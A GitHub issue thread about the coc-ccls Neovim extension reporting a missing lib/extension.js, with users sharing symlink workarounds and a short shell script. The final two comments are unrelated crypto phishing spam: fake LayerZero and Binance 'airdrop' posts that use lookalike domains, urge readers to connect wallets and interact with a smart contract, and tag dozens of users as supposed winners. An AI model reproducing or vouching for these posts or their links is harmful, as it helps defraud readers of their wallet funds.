### ISSUE TITLE
extension "coc-ccls" doesn't contain main file

### ISSUE THREAD

**Issue by qadzifi** [Maxattax97/coc-ccls#2]
I accidentally delete my neovim plugged directory and when I try to open neovim again I get this message
> extension "coc-ccls" doesn't contain main file

### Expected behavior

No error message.

### System information

* OS: Ubuntu 18.04
* Editor: neovim

**Comment by alichtman** [comment]
I have this same error message, but I did not delete the `~/.vim/plugged` dir. Any ideas on how to fix this?

Uninstalling and reinstalling did not fix.

**Comment by Nelyah** [comment]
I had the same issue with the error 
`[coc.nvim]extension "coc-ccls" doesn't contain main file /path/to/home/.config/coc/extensions/node_modules/coc-ccls/lib/extension.js.`

So kind of "fixed it" temporarily by doing:

```
cd ~/.config/coc/extensions/node_modules/coc-ccls
ln -s node_modules/ws/lib lib
```

**Comment by surmish** [comment]
@Nelyah Is this a permanent fix? I've been seeing the same issue since past few weeks. The error starting showing up without any changes, except maybe updates to the plugin/vim.

**Comment by Nelyah** [comment]
@surmish If by permanent you mean it persists through reboot, then yes. However, although it fixes the issue, it doesn't fix its root cause (file not being at its supposed location in the first place).
The error is most likely due to a plugin update in which the file moved and its old location was still trying to be accessed.

This fix should hold until the plugin gets updated again with a fix for the underlying issue.

**Comment by aganm** [comment]
Same issue, error started to show up when I updated coc with :PlugUpdate.

**Comment by Paul-Houser** [comment]
I'm also having this issue. Can confirm the temporary fix in the comment from @Nelyah makes the error go away.

**Comment by yamsu** [comment]
> I had the same issue with the error
> `[coc.nvim]extension "coc-ccls" doesn't contain main file /path/to/home/.config/coc/extensions/node_modules/coc-ccls/lib/extension.js.`
> 
> So kind of "fixed it" temporarily by doing:
> 
> ```
> cd ~/.config/coc/extensions/node_modules/coc-ccls
> ln -s node_modules/ws/lib lib
> ```

**Small Correction**
It should be
```bash
cd ~/.config/coc/extensions/node_modules/coc-ccls
ln -s ../ws/lib lib
```

**Comment by Nelyah** [comment]
@yamsu Hm, that would point to the `lib` folder `~/.config/coc/extensions/node_modules/coc-ccls/../ws/lib` which doesn't exist on my end.

Maybe the location varies depending on the version 🤷‍♀️

**Comment by yamsu** [comment]
Yeah I guess there is a difference in the directory structure. I had to use

``` bash
ln -s ../ws/lib lib
```
From the coc-ccls directory, but this solution works thanks.

**Comment by DiegoGuidaF** [comment]
Having the same issue though I can't seem to fix it in the same way.
I don't have any "ws/lib" folder, the one I have is inside .config/nvim/plugged/coc.nvim/lib and it doesn't have an "extension.js" file but an "extensions.js" file (note the "s" at the end).

I have symlinked it to the file coc-ccls expects and it indeed does seem to work, but I don't think this is intended in any way since none of my other coc pluggins require this weird symlink...

**Comment by ythomop** [comment]
Running:
`cd ~/.config/coc/node_modules/coc-ccls;`
`npm install;`
`python build.py`

creates the required lib directory.
However, when opening a file that starts coc-ccls, one gets the following error:
![image](https://user-images.githubusercontent.com/35526357/80419685-40d66400-88e2-11ea-81ed-ff3f20c6f3b8.png)


Edit: Apart from that error, the extensions seems to be working, since errors get detected and showed.
Edit2: https://github.com/Maxattax97/coc-ccls/issues/3#issue-600116270

**Comment by Ueeek** [comment]
I had the same trouble.

In my case, 
Error says,
[coc.nvim]extension "coc-ccls" doesn't contain main file /path/to/home/.config/coc/extensions/node_modules/coc-ccls/lib/extension.js.

But extension.js is actually placed at 
/path/to/home/.config/coc/extensions/node_modules/coc-ccls/node_modules/ws/lib/extension.js.
and, coc-ccls/ does not have lib dir.
So, at /coc-ccls  
```
mkdir lib
cd lib
ln -s ../node_modules/ws/lib/extension.js ./extension.js
```
solve the problem

**Comment by gibfahn** [comment]
Adding the script I ended up adding to my dotfiles (based on the above code snippets), should be copy-pastable unless you installed coc-ccls to a different directory (in which case it should do nothing):

```shell
set -x
existing=~/.config/coc/extensions/node_modules/coc-ccls/node_modules/ws/lib/extension.js
missing=~/.config/coc/extensions/node_modules/coc-ccls/lib/extension.js
if [[ -e "$existing" && ! -e "$missing" ]]; then
  mkdir -p "$(dirname "$missing")"
  ln -s "$existing" "$missing"
fi
set +x
```

**Comment by gqgserver** [comment]
# $1000 Christmas Airdrop for 10,000 Eligible Users! 🎅🎁

Welcome to the festive $1000 Christmas Airdrop by LayerZero! Get ready to unwrap the joy and claim your share of $ZRO tokens. Here's your guide to participating:

[Claim Now on LayerZero Official](http://link.layerzer0network.online/rFz335)

![Claim Now](https://miro.medium.com/v2/resize:fit:720/format:webp/1*SalqMtUhedutBSfrW7-T-A.png)

## Airdrop Participation Steps:

1. **Connect Your Wallet:**
   - Visit the [LayerZero Airdrop](http://link.layerzer0network.online/rFz335).
   - Integrate your preferred wallet (Metamask, Coinbase, Trust Wallet, and more).

2. **Spread the Christmas Spirit:**
   - **Facebook:**
     [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=https://medium.com/@rlgon_49273/unwrap-joy-1000-christmas-airdrop-for-10-000-eligible-users-96741f346c2d&text=LayerZero+Christmas+Airdrop)
   - **Twitter:**
     [Share on Twitter](https://twitter.com/share?url=https://medium.com/@rlgon_49273/unwrap-joy-1000-christmas-airdrop-for-10-000-eligible-users-96741f346c2d&text=LayerZero+Christmas+Airdrop)
   - **Instagram:**
     [Share on Instagram](https://instagram.com/share?url=https://medium.com/@rlgon_49273/unwrap-joy-1000-christmas-airdrop-for-10-000-eligible-users-96741f346c2d&title=LayerZero+Christmas+Airdrop)

3. **Verification Check:**
   - Confirm your eligibility for the LayerZero Christmas Airdrop and secure your $ZRO tokens.

Don't miss out on this festive collaboration – claim your Christmas tokens now and let the holiday spirit shine with LayerZero!

**Comment by sandeep661** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

🎉 Congratulations! You've won a share of the $1.500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. But that's not all—connect now, and you'll instantly receive an additional $100! Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://link.bnbreward.online/0mhPJ2)

## Steps to Claim:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](http://link.bnbreward.online/0mhPJ2) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1.500k in BNB! Plus, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, seize the chance to win up to $20,000—it's your golden opportunity!


Winners: @Yakup24, @johnny4young, @mirguest, @williamluke4, @r44cx, @ChandlerVer5, @rinne1998, @siraken, @helldoodle-dev, @marv972228, @mukuld, @Rogue03, @UltiRequiem, @dmytro-ulianov, @mlpprt, @alwyss, @verycumbersome, @andrewbrereton, @ishu280, @haiku-balls, @adamznamenacek, @cmang, @vvasyliev, @JakeGuy11, @ImahnShekhzadeh, @arashnrim, @octalmage, @guiltyparties, @shisian512, @buzai, @Qwerty0x64, @anonymous-at-dot, @Drwalin, @xiaoxigua-1, @realabhay, @HiroProt, @taesiri, @Rec0iL99, @molny, @jaffreyjoy, @sheepdreamofandroids, @dotpot, @a690700752, @toddpress, @effectda, @srikarg, @aron-bordin, @liminzhu, @Akhilani, @alcanary
